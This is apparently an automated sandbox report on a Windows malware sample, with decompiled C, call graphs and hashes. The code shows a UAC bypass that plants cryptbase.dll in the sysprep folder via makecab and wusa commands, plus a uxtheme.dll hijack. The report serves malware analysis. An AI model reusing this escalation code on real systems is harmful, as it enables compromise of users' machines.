    • Associated: 00000002.00000002.1212811993.00D35000.00000004.sdmp
    • Associated: 00000002.00000002.1212817413.00D36000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_d30000_cnwog.jbxd
    Similarity
    • API ID: ErrorLast$Local$Free$Initialize_memset$AllocDescriptorSecurity$AddressAllocateCreateDaclEntriesLibraryLoadMutexProc
    • String ID: Global\{3D5A1694-CC2C-4ee7-A3D5-A879A9E3A62A}
    • API String ID: 875962283-4277701779
    • Opcode ID: 1debc29687204d8d5c40f24a5d58c632276bfd845a24a771b8e62869e4c86b7c
    • Instruction ID: 2503a77dca8f72f9fc0eea3ea445c53bb06f724e3a29ced8753a5fa058e1cc30
    • Opcode Fuzzy Hash: 1debc29687204d8d5c40f24a5d58c632276bfd845a24a771b8e62869e4c86b7c
    • Instruction Fuzzy Hash: 8BE06D7AE0132977CB20A3A16C0AD9B7B6CCB04790F000020BE01E2242EA64D644C2F4
    Uniqueness

    Uniqueness Score: -1.00%

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 89 d322dc-d322e0 call d32291 91 d322e5-d322e9 89->91 92 d32303-d32307 91->92 93 d322eb-d322fd GetLastError CloseHandle 91->93 93->92
    C-Code - Quality: 86%
    			E00D322DC(void* __eflags) {
    				void* _t2;
    				void* _t6;
    				void* _t7;
    
    				_t7 = 0; // executed
    				_t2 = E00D32291(__eflags); // executed
    				_t6 = _t2;
    				if(_t6 != 0) {
    					_t1 = GetLastError() - 0xb7; // -183
    					asm("sbb esi, esi");
    					_t7 =  ~_t1 + 1;
    					CloseHandle(_t6);
    				}
    				return _t7;
    			}






    0x00d322de
    0x00d322e0
    0x00d322e5
    0x00d322e9
    0x00d322f1
    0x00d322f9
    0x00d322fc
    0x00d322fd
    0x00d322fd
    0x00d32307

    APIs
      • Part of subcall function 00D32291: _memset.LIBCMT ref: 00D322A1
      • Part of subcall function 00D32291: CreateMutexA.KERNELBASE(7622DAA3,00000000,Global\{3D5A1694-CC2C-4ee7-A3D5-A879A9E3A62A},7622DAA3,001F0001,?,?,00000000,7622DAA3,00D3232C,00000000), ref: 00D322C5
      • Part of subcall function 00D32291: GetLastError.KERNEL32(?,?,00000000,7622DAA3,00D3232C,00000000), ref: 00D322D1
    • GetLastError.KERNEL32(00000000,7622DAA3,00D3232C,00000000), ref: 00D322EB
    • CloseHandle.KERNEL32(00000000), ref: 00D322FD
    Memory Dump Source
    • Source File: 00000002.00000002.1212803884.00D31000.00000020.sdmp, Offset: 00D30000, based on PE: true
    • Associated: 00000002.00000002.1212798513.00D30000.00000002.sdmp
    • Associated: 00000002.00000002.1212811993.00D35000.00000004.sdmp
    • Associated: 00000002.00000002.1212817413.00D36000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_d30000_cnwog.jbxd
    Similarity
    • API ID: ErrorLast$CloseCreateHandleMutex_memset
    • String ID:
    • API String ID: 4044507352-0
    • Opcode ID: bae1cea1f710be6e6350f2a3098bab0256fb550beccbc7172ba36845b081baf2
    • Instruction ID: 8ae809df8858f6726c63d1e4a48d3c7f87cec0c69bb392cda06eadea0b78749f
    • Opcode Fuzzy Hash: bae1cea1f710be6e6350f2a3098bab0256fb550beccbc7172ba36845b081baf2
    • Instruction Fuzzy Hash: C6D0A736A04533CB8721276D6C0C59BBB34EFD1F617120115EC49E3110CB204C0346F5
    Uniqueness

    Uniqueness Score: -1.00%

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 94 d32481-d32488 95 d324a1-d324a3 ExitProcess 94->95 96 d3248a-d32491 94->96 96->95 97 d32493-d3249a 96->97 97->95 98 d3249c call d321ed 97->98 98->95
    C-Code - Quality: 100%
    			E00D32481() {
    
    				if( *0xd35a14 == 0 &&  *0xd35a04 == 0 &&  *0xd35a10 == 0) {
    					E00D321ED(); // executed
    				}
    				ExitProcess(0);
    			}



    0x00d32488
    0x00d3249c
    0x00d3249c
    0x00d324a3

    APIs
    • ExitProcess.KERNEL32 ref: 00D324A3
      • Part of subcall function 00D321ED: GetModuleFileNameA.KERNEL32(00000000,?,00000104,7622DAA3), ref: 00D32206
      • Part of subcall function 00D321ED: GetShortPathNameA.KERNEL32(?,?,00000104), ref: 00D32219
      • Part of subcall function 00D321ED: GetEnvironmentVariableA.KERNEL32(ComSpec,?,00000104), ref: 00D3224B
      • Part of subcall function 00D321ED: lstrcatA.KERNEL32(?,00D311F0), ref: 00D32267
      • Part of subcall function 00D321ED: lstrcatA.KERNEL32(?,?), ref: 00D32277
      • Part of subcall function 00D321ED: WinExec.KERNEL32(?,00000000), ref: 00D32282
    Memory Dump Source
    • Source File: 00000002.00000002.1212803884.00D31000.00000020.sdmp, Offset: 00D30000, based on PE: true
    • Associated: 00000002.00000002.1212798513.00D30000.00000002.sdmp
    • Associated: 00000002.00000002.1212811993.00D35000.00000004.sdmp
    • Associated: 00000002.00000002.1212817413.00D36000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_d30000_cnwog.jbxd
    Similarity
    • API ID: Namelstrcat$EnvironmentExecExitFileModulePathProcessShortVariable
    • String ID:
    • API String ID: 2303897708-0
    • Opcode ID: da211f2a8ff1d1343f9d8b3bff0a9aac4d841d4bb5c82a8378f544673248be9a
    • Instruction ID: dbe5f413f77fb6c5f6ab2e96b05d39b547dc0d4960eaeb9102a166db0ccbd2a4
    • Opcode Fuzzy Hash: da211f2a8ff1d1343f9d8b3bff0a9aac4d841d4bb5c82a8378f544673248be9a
    • Instruction Fuzzy Hash: 8AD04C38C11764CFEBA09B50FE497343760FB30B36F085215D549956A587B416C4EA72
    Uniqueness

    Uniqueness Score: -1.00%

    Non-executed Functions

    C-Code - Quality: 100%
    			E00D3259B(CHAR* _a4) {
    				struct _WIN32_FIND_DATAA _v324;
    				void* _t4;
    				void* _t7;
    
    				_t7 = 0;
    				_t4 = FindFirstFileA(_a4,  &_v324);
    				if(_t4 != 0xffffffff) {
    					_t7 = 1;
    					FindClose(_t4);
    				}
    				return _t7;
    			}






    0x00d325af
    0x00d325b1
    0x00d325ba
    0x00d325bd
    0x00d325be
    0x00d325be
    0x00d325c8

    APIs
    • FindFirstFileA.KERNEL32(00D32DA5,?,00000104), ref: 00D325B1
    • FindClose.KERNEL32(00000000), ref: 00D325BE
    Memory Dump Source
    • Source File: 00000002.00000002.1212803884.00D31000.00000020.sdmp, Offset: 00D30000, based on PE: true
    • Associated: 00000002.00000002.1212798513.00D30000.00000002.sdmp
    • Associated: 00000002.00000002.1212811993.00D35000.00000004.sdmp
    • Associated: 00000002.00000002.1212817413.00D36000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_d30000_cnwog.jbxd
    Similarity
    • API ID: Find$CloseFileFirst
    • String ID:
    • API String ID: 2295610775-0
    • Opcode ID: de8d2d63487e2b41a61058fa48158cff4db7a0f924e82ea0d803e2babce30ed3
    • Instruction ID: f61f75cf25dba015e0aea4546918026107dd77363989484b4d9f032e73318884
    • Opcode Fuzzy Hash: de8d2d63487e2b41a61058fa48158cff4db7a0f924e82ea0d803e2babce30ed3
    • Instruction Fuzzy Hash: 72D0A7B69001347BC7152769AC08DEE766CDF09326F000221FE1AD11E0E334DB9A86F5
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E00D33E80() {
    
    				return  *[fs:0x30];
    			}



    0x00d33e86

    Memory Dump Source
    • Source File: 00000002.00000002.1212803884.00D31000.00000020.sdmp, Offset: 00D30000, based on PE: true
    • Associated: 00000002.00000002.1212798513.00D30000.00000002.sdmp
    • Associated: 00000002.00000002.1212811993.00D35000.00000004.sdmp
    • Associated: 00000002.00000002.1212817413.00D36000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_d30000_cnwog.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
    • Instruction ID: 25aae2582423029eb19f4489c776d3d70638aac6ce1da4afce0c8a8e650509f3
    • Opcode Fuzzy Hash: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
    • Instruction Fuzzy Hash:
    Uniqueness

    Uniqueness Score: -1.00%

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 100 d33143-d33214 GetModuleHandleA GetSystemDirectoryA call d320ec call d32194 GetTempPathA call d320ec call d32194 GetTempPathA GetTickCount call d33620 wsprintfA GetModuleHandleA GetProcAddress 111 d33216-d33225 GetCurrentProcess 100->111 112 d33234 100->112 111->112 117 d33227-d3322b 111->117 113 d33239-d33265 call d320ce GetClipboardFormatNameA call d320ec 112->113 122 d33267-d3327c call d32104 113->122 123 d332a8-d332af 113->123 117->112 119 d3322d-d3322f 117->119 121 d334e8-d334ec 119->121 129 d3328b-d332a0 call d33b50 122->129 130 d3327e-d33284 122->130 123->113 125 d332b1-d332b7 123->125 127 d334e5 125->127 128 d332bd-d332dc call d3250c 125->128 127->121 128->127 134 d332e2-d332ff call d32f02 128->134 129->123 137 d332a2-d332a5 129->137 130->129 139 d33301-d33305 134->139 140 d33368-d3337c call d324aa 134->140 137->123 141 d33307-d33349 GetTempPathA GetTickCount call d33620 wsprintfA MoveFileA 139->141 142 d3334b-d3335f call d324aa 139->142 149 d33381-d3338e LocalFree 140->149 150 d3337e 140->150 141->142 142->140 152 d33361 142->152 149->127 151 d33394-d33398 149->151 150->149 153 d33434-d3343b call d327dd 151->153 154 d3339e-d333ab call d33065 151->154 152->140 159 d33445-d33447 call d330cd 153->159 160 d3343d-d33443 LockWorkStation 153->160 154->127 161 d333b1 154->161 162 d3344c-d33461 CreateEventA 159->162 160->162 163 d333b8-d333e6 call d320ce GetClipboardFormatNameA call d320ec 161->163 166 d33463-d33469 GetLastError 162->166 167 d3346b-d33479 WaitForSingleObject 162->167 175 d33403-d3340d 163->175 176 d333e8-d333fd call d33b50 163->176 166->127 169 d33482-d334df CloseHandle GetTempPathA GetTickCount call d33620 wsprintfA MoveFileA CopyFileA 167->169 170 d3347b 167->170 169->127 170->169 175->163 178 d3340f 175->178 176->127 176->175 179 d33416-d33426 RegisterWindowMessageA 178->179 179->166 181 d33428-d33432 179->181 181->153 181->179
    C-Code - Quality: 85%
    			E00D33143(void* __eflags, intOrPtr _a4, intOrPtr _a8, int _a12) {
    				void* _v8;
    				struct _SECURITY_ATTRIBUTES* _v12;
    				char _v16;
    				signed int _v20;
    				signed int _v24;
    				struct _SECURITY_ATTRIBUTES* _v28;
    				signed int _v32;
    				struct HINSTANCE__* _v36;
    				char _v296;
    				char _v556;
    				char _v816;
    				char _v1076;
    				char _v1336;
    				char _v1596;
    				struct HINSTANCE__* _t88;
    				void* _t105;
    				signed int _t125;
    				void* _t130;
    				long _t135;
    				long _t162;
    				void* _t174;
    				void* _t182;
    				intOrPtr* _t189;
    				int _t190;
    				void* _t194;
    				void* _t195;
    				void* _t196;
    
    				_v28 = 0;
    				_t88 = GetModuleHandleA(0);
    				_v12 = 0;
    				_v24 = 0;
    				_v36 = _t88;
    				GetSystemDirectoryA( &_v816, 0x104);
    				E00D32194(_t194 + E00D320EC( &_v816) - 0x32c, "\\uxtheme.dll");
    				GetTempPathA(0x104,  &_v296);
    				E00D32194(_t194 + E00D320EC( &_v296) - 0x124, "\\uxtheme.dll");
    				GetTempPathA(0x104,  &_v1076);
    				_push(GetTickCount());
    				_push("\\%.8x.tmp");
    				_t105 = E00D33620( &_v1076);
    				_pop(_t182);
    				wsprintfA(_t194 + _t105 - 0x430, ??);
    				_v32 = _v32 & 0x00000000;
    				_t196 = _t195 + 0xc;
    				_t189 = GetProcAddress(GetModuleHandleA("kernel32.dll"), "IsWow64Process");
    				if(_t189 != 0) {
    					_push( &_v32);
    					_push(GetCurrentProcess());
    					if( *_t189() == 0 || _v32 == 0) {
    						goto L4;
    					} else {
    						return 0;
    					}
    				}
    				L4:
    				_t190 = 0xc001;
    				do {
    					E00D320CE( &_v556, 0, 0x104);
    					GetClipboardFormatNameA(_t190,  &_v556, 0x104);
    					if(E00D320EC( &_v556) != 0) {
    						if(E00D32104( &_v556,  &_v296) == 0) {
    							_v12 = _t190 & 0x0000ffff;
    							_v24 = 1;
    						}
    						_t174 = E00D33B50( &_v556, "\\uxtheme.dll");
    						_pop(_t182);
    						if(_t174 != 0) {
    							_v12 = _t190 & 0x0000ffff;
    						}
    					}
    					_t190 = _t190 + 1;
    				} while (_t190 < 0xffff);
    				if(_v12 == 0) {
    					L38:
    					return _v28;
    				}
    				_v8 = 0;
    				_v16 = 0;
    				_v20 = 0;
    				if(E00D3250C(_t182,  &_v816,  &_v8,  &_v16) == 0) {
    					goto L38;
    				}
    				if(E00D32F02(_v8, _v16,  &_v1076, _a12) != 0) {
    					if(_v24 != 0) {
    						GetTempPathA(0x104,  &_v1336);
    						_t162 = GetTickCount();
    						wsprintfA(_t194 + E00D33620( &_v1336) - 0x534, "\\%.8x.tmp", _t162);
    						_t196 = _t196 + 0xc;
    						MoveFileA( &_v296,  &_v1336);
    					}
    					if(E00D324AA( &_v296, _v8, _v16) != 0) {
    						_v20 = 1;
    					}
    				}
    				_t125 = E00D324AA( &_v1076, _a4, _a8);
    				if(_t125 == 0) {
    					_v20 = _v20 & _t125;
    				}
    				LocalFree(_v8);
    				if(_v20 != 0) {
    					if(_v24 != 0) {
    						L30:
    						if(E00D327DD() == 0) {
    							E00D330CD(0x55);
    						} else {
    							__imp__LockWorkStation();
    						}
    						_t130 = CreateEventA(0, 0, 0, "Global\\AtomFun");
    						_a12 = _t130;
    						if(_t130 != 0) {
    							if(WaitForSingleObject(_t130, 0x2710) == 0) {
    								_v28 = 1;
    							}
    							CloseHandle(_a12);
    							GetTempPathA(0x104,  &_v1596);
    							_t135 = GetTickCount();
    							wsprintfA(_t194 + E00D33620( &_v1596) - 0x638, "\\%.8x.tmp", _t135);
    							MoveFileA( &_v296,  &_v1596);
    							CopyFileA( &_v816,  &_v296, 0);
    						} else {
    							L34:
    							GetLastError();
    						}
    						goto L38;
    					}
    					if(E00D33065(_v36, _v12) == 0) {
    						goto L38;
    					}
    					_a12 = 0xc001;
    					while(1) {
    						E00D320CE( &_v556, 0, 0x104);
    						GetClipboardFormatNameA(_a12,  &_v556, 0x104);
    						if(E00D320EC( &_v556) != 0 && E00D33B50( &_v556, "\\uxtheme.dll") != 0) {
    							goto L38;
    						}
    						_a12 = _a12 + 1;
    						if(_a12 < 0xffff) {
    							continue;
    						}
    						_a12 = 0xc001;
    						while(RegisterWindowMessageA( &_v296) != 0) {
    							_a12 = _a12 + 1;
    							if(_a12 < 0xffff) {
    								continue;
    							}
    							goto L30;
    						}
    						goto L34;
    					}
    				}
    			}






























    0x00d33158
    0x00d3315b
    0x00d3315d
    0x00d33160
    0x00d33163
    0x00d33173
    0x00d33192
    0x00d331a5
    0x00d331c0
    0x00d331cd
    0x00d331d5
    0x00d331dc
    0x00d331e2
    0x00d331e7
    0x00d331f0
    0x00d331f6
    0x00d331fa
    0x00d33210
    0x00d33214
    0x00d33219
    0x00d33220
    0x00d33225
    0x00000000
    0x00d3322d
    0x00000000
    0x00d3322d
    0x00d33225
    0x00d33234
    0x00d33234
    0x00d33239
    0x00d33243
    0x00d33251
    0x00d33265
    0x00d3327c
    0x00d33281
    0x00d33284
    0x00d33284
    0x00d33297
    0x00d3329d
    0x00d332a0
    0x00d332a5
    0x00d332a5
    0x00d332a0
    0x00d332a8
    0x00d332a9
    0x00d332b7
    0x00d334e5
    0x00000000
    0x00d334e5
    0x00d332bd
    0x00d332c0
    0x00d332c3
    0x00d332dc
    0x00000000
    0x00000000
    0x00d332ff
    0x00d33305
    0x00d3330f
    0x00d33311
    0x00d33332
    0x00d33338
    0x00d33349
    0x00d33349
    0x00d3335f
    0x00d33361
    0x00d33361
    0x00d3335f
    0x00d33375
    0x00d3337c
    0x00d3337e
    0x00d3337e
    0x00d33384
    0x00d3338e
    0x00d33398
    0x00d33434
    0x00d3343b
    0x00d33447
    0x00d3343d
    0x00d3343d
    0x00d3343d
    0x00d33456
    0x00d3345c
    0x00d33461
    0x00d33479
    0x00d3347b
    0x00d3347b
    0x00d33485
    0x00d33493
    0x00d33495
    0x00d334b6
    0x00d334cd
    0x00d334df
    0x00d33463
    0x00d33463
    0x00d33463
    0x00d33463
    0x00000000
    0x00d33461
    0x00d333ab
    0x00000000
    0x00000000
    0x00d333b1
    0x00d333b8
    0x00d333c2
    0x00d333d2
    0x00d333e6
    0x00000000
    0x00000000
    0x00d33403
    0x00d3340d
    0x00000000
    0x00000000
    0x00d3340f
    0x00d33416
    0x00d33428
    0x00d33432
    0x00000000
    0x00000000
    0x00000000
    0x00d33432
    0x00000000
    0x00d33416
    0x00d333b8

    APIs
    • GetModuleHandleA.KERNEL32(00000000,00000000,7622DAA3,00000000), ref: 00D3315B
    • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00D33173
    • GetTempPathA.KERNEL32(00000104,?), ref: 00D331A5
    • GetTempPathA.KERNEL32(00000104,?), ref: 00D331CD
    • GetTickCount.KERNEL32 ref: 00D331CF
    • _strlen.LIBCMT ref: 00D331E2
    • wsprintfA.USER32 ref: 00D331F0
    • GetModuleHandleA.KERNEL32(kernel32.dll,IsWow64Process), ref: 00D33207
    • GetProcAddress.KERNEL32(00000000), ref: 00D3320A
    • GetCurrentProcess.KERNEL32(00000000), ref: 00D3321A
      • Part of subcall function 00D320CE: _memset.LIBCMT ref: 00D320E1
    • GetClipboardFormatNameA.USER32(0000C001,?,00000104), ref: 00D33251
      • Part of subcall function 00D3250C: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00D32526
      • Part of subcall function 00D3250C: GetFileSize.KERNEL32(00000000,00000000,7622DAA3,?,?,00D31DD6,?,?,?,?,?), ref: 00D32536
      • Part of subcall function 00D3250C: LocalAlloc.KERNEL32(00000040,00000000,?,?,00D31DD6,?,?,?,?,?), ref: 00D32544
      • Part of subcall function 00D3250C: ReadFile.KERNEL32(00000000,00000000,00D31DD6,?,00000000), ref: 00D3255F
      • Part of subcall function 00D3250C: GetLastError.KERNEL32(?,?,00D31DD6,?,?,?,?,?), ref: 00D32572
      • Part of subcall function 00D3250C: GetLastError.KERNEL32(?,?,00D31DD6,?,?,?,?,?), ref: 00D3257A
      • Part of subcall function 00D3250C: CloseHandle.KERNEL32(00000000), ref: 00D32583
      • Part of subcall function 00D3250C: GetLastError.KERNEL32(?,?,00D31DD6,?,?,?,?,?), ref: 00D3258C
      • Part of subcall function 00D32F02: GetModuleHandleA.KERNEL32(kernel32.dll,LoadLibraryA,?,00000000,00000110,?,.rsrc,00000005,76248354,0000C002,00000104,76248354,?,?), ref: 00D32F9E
      • Part of subcall function 00D32F02: GetProcAddress.KERNEL32(00000000), ref: 00D32FA5
      • Part of subcall function 00D32F02: GetModuleHandleA.KERNEL32(kernel32.dll,WinExec), ref: 00D32FB7
      • Part of subcall function 00D32F02: GetProcAddress.KERNEL32(00000000), ref: 00D32FBE
      • Part of subcall function 00D32F02: CheckSumMappedFile.IMAGEHLP(?,?,?,00000000,?,00000111,00D32E88,?,?,?,?), ref: 00D33043
      • Part of subcall function 00D32F02: GetLastError.KERNEL32 ref: 00D33055
    • GetTempPathA.KERNEL32(00000104,?), ref: 00D3330F
    • GetTickCount.KERNEL32 ref: 00D33311
    • _strlen.LIBCMT ref: 00D33324
    • wsprintfA.USER32 ref: 00D33332
    • MoveFileA.KERNEL32(?,?), ref: 00D33349
      • Part of subcall function 00D324AA: CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 00D324BF
      • Part of subcall function 00D324AA: WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 00D324DB
      • Part of subcall function 00D324AA: GetLastError.KERNEL32(?,00D3337A,?,?,?,?,?,?,00D31E68,?,?,?,?), ref: 00D324E8
      • Part of subcall function 00D324AA: FlushFileBuffers.KERNEL32(00000000), ref: 00D324EF
      • Part of subcall function 00D324AA: CloseHandle.KERNEL32(00000000), ref: 00D324F6
      • Part of subcall function 00D324AA: GetLastError.KERNEL32(?,00D3337A,?,?,?,?,?,?,00D31E68,?,?,?,?), ref: 00D324FE
    • LocalFree.KERNEL32(?,?,?,?,?,?,?,00D31E68,?,?,?,?), ref: 00D33384
    • CopyFileA.KERNEL32(?,?,00000000), ref: 00D334DF
      • Part of subcall function 00D33065: RegisterClassExA.USER32(?), ref: 00D330A4
      • Part of subcall function 00D33065: UnregisterClassA.USER32(?,?), ref: 00D330B4
    • GetClipboardFormatNameA.USER32(0000C001,?,00000104), ref: 00D333D2
    • RegisterWindowMessageA.USER32(?,?), ref: 00D3341D
      • Part of subcall function 00D327DD: GetVersionExA.KERNEL32(?), ref: 00D327F7
      • Part of subcall function 00D327DD: GetLastError.KERNEL32 ref: 00D32818
    • LockWorkStation.USER32 ref: 00D3343D
      • Part of subcall function 00D330CD: SendInput.USER32(00000001,?,0000001C), ref: 00D330FF
      • Part of subcall function 00D330CD: SendInput.USER32(00000001,?,0000001C), ref: 00D33114
      • Part of subcall function 00D330CD: SendInput.USER32(00000001,?,0000001C), ref: 00D33127
      • Part of subcall function 00D330CD: SendInput.USER32(00000001,?,0000001C), ref: 00D3313A
    • CreateEventA.KERNEL32(00000000,00000000,00000000,Global\AtomFun,00000055), ref: 00D33456
    • GetLastError.KERNEL32 ref: 00D33463
    • WaitForSingleObject.KERNEL32(00000000,00002710), ref: 00D33471
    • CloseHandle.KERNEL32(00000000), ref: 00D33485
    • GetTempPathA.KERNEL32(00000104,?), ref: 00D33493
    • GetTickCount.KERNEL32 ref: 00D33495
    • _strlen.LIBCMT ref: 00D334A8
    • wsprintfA.USER32 ref: 00D334B6
    • MoveFileA.KERNEL32(?,?), ref: 00D334CD
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1212803884.00D31000.00000020.sdmp, Offset: 00D30000, based on PE: true
    • Associated: 00000002.00000002.1212798513.00D30000.00000002.sdmp
    • Associated: 00000002.00000002.1212811993.00D35000.00000004.sdmp
    • Associated: 00000002.00000002.1212817413.00D36000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_d30000_cnwog.jbxd
    Similarity
    • API ID: File$ErrorLast$Handle$InputModulePathSendTemp$AddressCloseCountCreateProcTick_strlenwsprintf$ClassClipboardFormatLocalMoveNameRegister$AllocBuffersCheckCopyCurrentDirectoryEventFlushFreeLockMappedMessageObjectProcessReadSingleSizeStationSystemUnregisterVersionWaitWindowWorkWrite_memset
    • String ID: Global\AtomFun$IsWow64Process$\%.8x.tmp$\uxtheme.dll$kernel32.dll
    • API String ID: 1235156964-746268175
    • Opcode ID: 193cebc3165e6567cfa4dd3df8f7029aff6ea665a5c294871f733cfca0c999f7
    • Instruction ID: 4f1f9e1947840b6508a802ae8e85d0289fc75af6d4dd923670b529d3b361552f
    • Opcode Fuzzy Hash: 193cebc3165e6567cfa4dd3df8f7029aff6ea665a5c294871f733cfca0c999f7
    • Instruction Fuzzy Hash: B7A1F97680025AABDF11AFA0DD49AEE77BCEF08351F0445A6F505E2150EB74DB94CBB0
    Uniqueness

    Uniqueness Score: -1.00%

    Control-flow Graph

    C-Code - Quality: 94%
    			E00D32BDC(void* __ebx) {
    				intOrPtr _t71;
    				long _t74;
    				void* _t135;
    				void* _t143;
    				int _t152;
    				intOrPtr* _t154;
    				signed int _t155;
    				void* _t159;
    				void* _t161;
    
    				_t135 = __ebx;
    				_t159 = _t161 - 0x6c;
    				 *((intOrPtr*)(_t159 + 0x5c)) = 0;
    				 *((intOrPtr*)(_t159 + 0x60)) = 0;
    				_t154 = GetProcAddress(GetModuleHandleA("kernel32.dll"), "IsWow64Process");
    				if(_t154 != 0) {
    					 *_t154(GetCurrentProcess(), _t159 + 0x60);
    				}
    				 *(_t159 - 0x38) = 0x94;
    				_t155 = 0 |  *((intOrPtr*)(_t159 + 0x60)) == 0x00000000;
    				if(GetVersionExA(_t159 - 0x38) == 0) {
    					GetLastError();
    					goto L23;
    				} else {
    					if( *((intOrPtr*)(_t159 - 0x28)) != 2 ||  *((intOrPtr*)(_t159 - 0x34)) != 6 ||  *((intOrPtr*)(_t159 - 0x30)) != 1 &&  *((intOrPtr*)(_t159 - 0x30)) != 2) {
    						_t155 = 0;
    					}
    					if(_t155 == 0) {
    						L23:
    						_t71 = 0;
    						goto L24;
    					} else {
    						GetTempPathA(0x104, _t159 - 0x240);
    						_t74 = GetTickCount();
    						wsprintfA(_t159 + E00D33620(_t159 - 0x240) - 0x240, "\\%.8x.tmp", _t74);
    						if(E00D324AA(_t159 - 0x240,  *((intOrPtr*)(_t159 + 0x74)),  *(_t159 + 0x78)) == 0) {
    							goto L23;
    						}
    						GetSystemDirectoryA(_t159 - 0x54c, 0x104);
    						E00D33A60(_t159 - 0x54c, "\\cryptbase.dll");
    						GetTempPathA(0x104, _t159 - 0x344);
    						E00D33A60(_t159 - 0x344, "\\cryptbase.dll");
    						 *(_t159 + 0x68) =  *(_t159 + 0x68) & 0x00000000;
    						 *(_t159 + 0x64) =  *(_t159 + 0x64) & 0x00000000;
    						_t143 = _t135;
    						if(E00D3250C(_t143, _t159 - 0x54c, _t159 + 0x68, _t159 + 0x64) != 0) {
    							if(E00D32F02( *(_t159 + 0x68),  *(_t159 + 0x64), _t159 - 0x240,  *((intOrPtr*)(_t159 + 0x7c))) != 0 && E00D324AA(_t159 - 0x344,  *(_t159 + 0x68),  *(_t159 + 0x64)) != 0) {
    								GetTempPathA(0x104, _t159 - 0x13c);
    								E00D33A60(_t159 - 0x13c, "\\cryptbase.msu");
    								DeleteFileA(_t159 - 0x13c);
    								_push(_t159 - 0x13c);
    								E00D32AF9(0, "makecab.exe /V1 %s %s", _t159 - 0x344);
    								if(E00D3259B(_t159 - 0x13c) != 0) {
    									_t152 = 0x103;
    									GetWindowsDirectoryA(_t159 - 0x650, _t152);
    									E00D33A60(_t159 - 0x650, "\\system32\\sysprep\\sysprep.exe");
    									GetWindowsDirectoryA(_t159 - 0x448, _t152);
    									E00D33A60(_t159 - 0x448, "\\system32\\sysprep\\cryptbase.dll");
    									E00D32AF9(0, "cmd.exe /C wusa.exe %s /extract:%%WINDIR%%\\system32\\sysprep", _t159 - 0x13c);
    									if(E00D3259B(_t159 - 0x448) != 0) {
    										 *(_t159 + 0x78) =  *(_t159 + 0x78) & 0x00000000;
    										if(E00D32AF9(_t159 + 0x78, "cmd.exe /C %s", _t159 - 0x650) != 0 &&  *(_t159 + 0x78) == 0x50574e44) {
    											 *((intOrPtr*)(_t159 + 0x5c)) = 1;
    										}
    										DeleteFileA(_t159 - 0x448);
    									}
    									DeleteFileA(_t159 - 0x13c);
    								}
    							}
    							LocalFree( *(_t159 + 0x68));
    						}
    						DeleteFileA(_t159 - 0x344);
    						DeleteFileA(_t159 - 0x240);
    						_t71 =  *((intOrPtr*)(_t159 + 0x5c));
    						L24:
    						return _t71;
    					}
    				}
    			}












    0x00d32bdc
    0x00d32bdd
    0x00d32bf5
    0x00d32bf8
    0x00d32c08
    0x00d32c0c
    0x00d32c19
    0x00d32c19
    0x00d32c20
    0x00d32c2a
    0x00d32c38
    0x00d32e77
    0x00000000
    0x00d32c3e
    0x00d32c42
    0x00d32c56
    0x00d32c56
    0x00d32c5a
    0x00d32e7d
    0x00d32e7d
    0x00000000
    0x00d32c60
    0x00d32c73
    0x00d32c75
    0x00d32c96
    0x00d32cb3
    0x00000000
    0x00000000
    0x00d32cc2
    0x00d32cd5
    0x00d32ce4
    0x00d32cee
    0x00d32cf3
    0x00d32cf7
    0x00d32cfc
    0x00d32d19
    0x00d32d36
    0x00d32d5e
    0x00d32d6c
    0x00d32d7a
    0x00d32d82
    0x00d32d91
    0x00d32da7
    0x00d32dad
    0x00d32dbe
    0x00d32dcc
    0x00d32ddb
    0x00d32de9
    0x00d32dfc
    0x00d32e12
    0x00d32e14
    0x00d32e32
    0x00d32e3d
    0x00d32e3d
    0x00d32e4b
    0x00d32e4b
    0x00d32e54
    0x00d32e54
    0x00d32da7
    0x00d32e59
    0x00d32e59
    0x00d32e66
    0x00d32e6f
    0x00d32e71
    0x00d32e7f
    0x00d32e85
    0x00d32e85
    0x00d32c5a

    APIs
    • GetModuleHandleA.KERNEL32(kernel32.dll,IsWow64Process,00000000,7622DAA3), ref: 00D32BFB
    • GetProcAddress.KERNEL32(00000000), ref: 00D32C02
    • GetCurrentProcess.KERNEL32(?), ref: 00D32C12
    • GetVersionExA.KERNEL32(?), ref: 00D32C30
    • GetTempPathA.KERNEL32(00000104,?), ref: 00D32C73
    • GetTickCount.KERNEL32 ref: 00D32C75
    • _strlen.LIBCMT ref: 00D32C88
    • wsprintfA.USER32 ref: 00D32C96
      • Part of subcall function 00D324AA: CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 00D324BF
      • Part of subcall function 00D324AA: WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 00D324DB
      • Part of subcall function 00D324AA: GetLastError.KERNEL32(?,00D3337A,?,?,?,?,?,?,00D31E68,?,?,?,?), ref: 00D324E8
      • Part of subcall function 00D324AA: FlushFileBuffers.KERNEL32(00000000), ref: 00D324EF
      • Part of subcall function 00D324AA: CloseHandle.KERNEL32(00000000), ref: 00D324F6
      • Part of subcall function 00D324AA: GetLastError.KERNEL32(?,00D3337A,?,?,?,?,?,?,00D31E68,?,?,?,?), ref: 00D324FE
    • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00D32CC2
    • GetTempPathA.KERNEL32(00000104,?), ref: 00D32CE4
